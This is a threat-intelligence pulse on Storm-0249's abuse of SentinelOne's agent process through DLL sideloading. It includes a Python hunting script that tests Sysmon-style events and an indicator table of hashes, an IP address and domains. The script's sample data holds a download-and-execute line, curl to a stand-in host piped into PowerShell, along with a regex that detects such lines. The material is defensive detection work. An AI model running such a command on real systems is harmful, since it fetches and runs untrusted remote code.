Threat Spotlight: Storm-0249 Moves from Mass Phishing to Precision EDR Exploitation
Storm-0249, an established initial access broker, has shifted from mass phishing to more sophisticated post-exploitation tradecraft. The group now abuses a legitimate Endpoint Detection and Response process, SentinelOne's SentinelAgentWorker.exe, through DLL sideloading: the malicious DLL executes inside a trusted security-agent process, so its activity blends in with routine agent behaviour, evades defenses, and provides persistence. Other tactics observed include spoofed Microsoft domains, piping curl output directly into PowerShell, and fileless execution. Storm-0249's ability to weaponize trusted processes and carry out stealthy reconnaissance poses a significant challenge for security teams. Its evolution reflects a broader trend in the ransomware-as-a-service ecosystem: a lower technical barrier for attackers and faster spread of ransomware across sectors.
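The summary above names three behaviours a defender can hunt for: the SentinelOne worker binary running from somewhere other than its install directory, that process loading an unsigned DLL from a user-writable location (the sideloading signal), and curl output piped into a PowerShell interpreter. The block below is an added example written for this page, not ReliaQuest's or AlienVault's code. It evaluates those three rules over a handful of constructed Sysmon-style events (Event ID 1 process creation, Event ID 7 image load, reduced to plain dicts using Sysmon's field names). The expected install directory, the sample paths, the DLL name and the URL in the sample command line are all assumptions for illustration; substitute the paths your deployment actually uses.

```python
"""Hunting rules for the Storm-0249 tradecraft summarized above.

Added example, not the original page's or vendor's code.  Events are
constructed Sysmon-style records in dict form; field names follow Sysmon
(Image, CommandLine, ImageLoaded, Signed, SignatureStatus).
"""
import re
from typing import Dict, List

# Assumption: where the legitimate agent binary lives on a managed host.
EXPECTED_AGENT_DIR = "c:\\program files\\sentinelone\\"
AGENT_BINARY = "sentinelagentworker.exe"

# Path fragments an unprivileged user can normally write to.  A DLL loaded
# from one of these by a security-vendor process is a sideloading signal.
USER_WRITABLE = ("\\users\\", "\\programdata\\", "\\temp\\", "\\appdata\\")

# curl (or its PowerShell download aliases) feeding a PowerShell interpreter.
CURL_TO_PS = re.compile(
    r"(curl|iwr|invoke-webrequest|irm|invoke-restmethod)[^|]*\|\s*"
    r"(powershell|pwsh|iex|invoke-expression)",
    re.IGNORECASE,
)


def _norm(path: str) -> str:
    """Lower-case a Windows path and normalise separators for comparison."""
    return path.replace("/", "\\").lower()


def _basename(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[-1]


def _dirname(path: str) -> str:
    return _norm(path).rsplit("\\", 1)[0]


def evaluate(events: List[Dict[str, object]]) -> List[Dict[str, str]]:
    """Return one finding per event that matches a hunting rule."""
    findings: List[Dict[str, str]] = []
    for ev in events:
        image = _norm(str(ev.get("Image", "")))
        is_agent = _basename(image) == AGENT_BINARY
        in_install_dir = image.startswith(EXPECTED_AGENT_DIR)

        if ev["EventID"] == 1:  # process creation
            cmd = str(ev.get("CommandLine", ""))
            if is_agent and not in_install_dir:
                findings.append({"rule": "agent_outside_install_dir", "image": image})
            if CURL_TO_PS.search(cmd):
                findings.append({"rule": "curl_to_powershell", "cmdline": cmd})

        elif ev["EventID"] == 7 and is_agent:  # image (DLL) load by the agent
            dll = _norm(str(ev.get("ImageLoaded", "")))
            unsigned = (str(ev.get("Signed", "false")).lower() != "true"
                        or ev.get("SignatureStatus") != "Valid")
            writable = any(marker in dll for marker in USER_WRITABLE)
            same_dir_as_rogue_exe = _dirname(dll) == _dirname(image) and not in_install_dir
            if unsigned and (writable or same_dir_as_rogue_exe):
                findings.append({"rule": "agent_sideload_candidate", "image": image, "dll": dll})
    return findings


# Constructed sample telemetry: two benign events, then three that should fire.
SAMPLE_EVENTS = [
    {"EventID": 1,
     "Image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "CommandLine": "SentinelAgentWorker.exe"},
    {"EventID": 7,
     "Image": r"C:\Program Files\SentinelOne\Sentinel Agent\SentinelAgentWorker.exe",
     "ImageLoaded": r"C:\Windows\System32\kernel32.dll",
     "Signed": "true", "SignatureStatus": "Valid"},
    {"EventID": 1,
     "Image": r"C:\Users\Public\Libraries\SentinelAgentWorker.exe",
     "CommandLine": "SentinelAgentWorker.exe"},
    {"EventID": 7,
     "Image": r"C:\Users\Public\Libraries\SentinelAgentWorker.exe",
     "ImageLoaded": r"C:\Users\Public\Libraries\sideloaded.dll",  # hypothetical name
     "Signed": "false", "SignatureStatus": "Unavailable"},
    {"EventID": 1,
     "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": 'cmd.exe /c curl -s http://example.invalid/stage | powershell -nop -'},
]

if __name__ == "__main__":
    for f in evaluate(SAMPLE_EVENTS):
        print(f)
```

The first two rules are deliberately narrow (the real binary name, outside the real install path) so they stay quiet on healthy hosts; the curl rule is broader and will also catch `iwr`/`irm` piped into `iex`, which is the same download-and-execute pattern expressed with PowerShell aliases. Tune `EXPECTED_AGENT_DIR` and `USER_WRITABLE` to your environment before deploying.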
Indicators of Compromise
| Type | Value |
|---|---|
| MD5 | aa157129a9df47ede836516dd4c7ec2d |
| MD5 | d2237059bb738015b0878f99029be3a6 |
| SHA-1 | 07c5599b9bb00feb70c2d5e43b4b76f228866930 |
| SHA-1 | 423f2fcf7ed347ee57c1a3cffa14099ec16ad09c |
| SHA-256 | 10910179af37ba38786f5a1b59d4dd1c43b6aa512850bbd47fb0feb965b2eb5c |
| SHA-256 | 8113fc3b4f82fb49f8dd853ca8e1275e0dfb06e48f39830708e4437fe8afbdfb |
| IP | 178.16.52.145 |
| Domain | hristomasitomasdf.com |
| Domain | krivomadogolyhp.com |
| Domain | sgcipl.com |
Technical Details
- Author: AlienVault
- TLP: white
- References: https://reliaquest.com/blog/threat-spotlight-storm-0249-precision-endpoint-exploitation
- Adversary: Storm-0249
- Pulse ID: 69393ab7f0d78ccb11a14d9a
- Threat Score: null
Threat ID: 69393d10fd479f45ea600b7f
Added to database: 12/10/2025, 9:27:44 AM
Last updated: 12/10/2025, 9:27:48 AM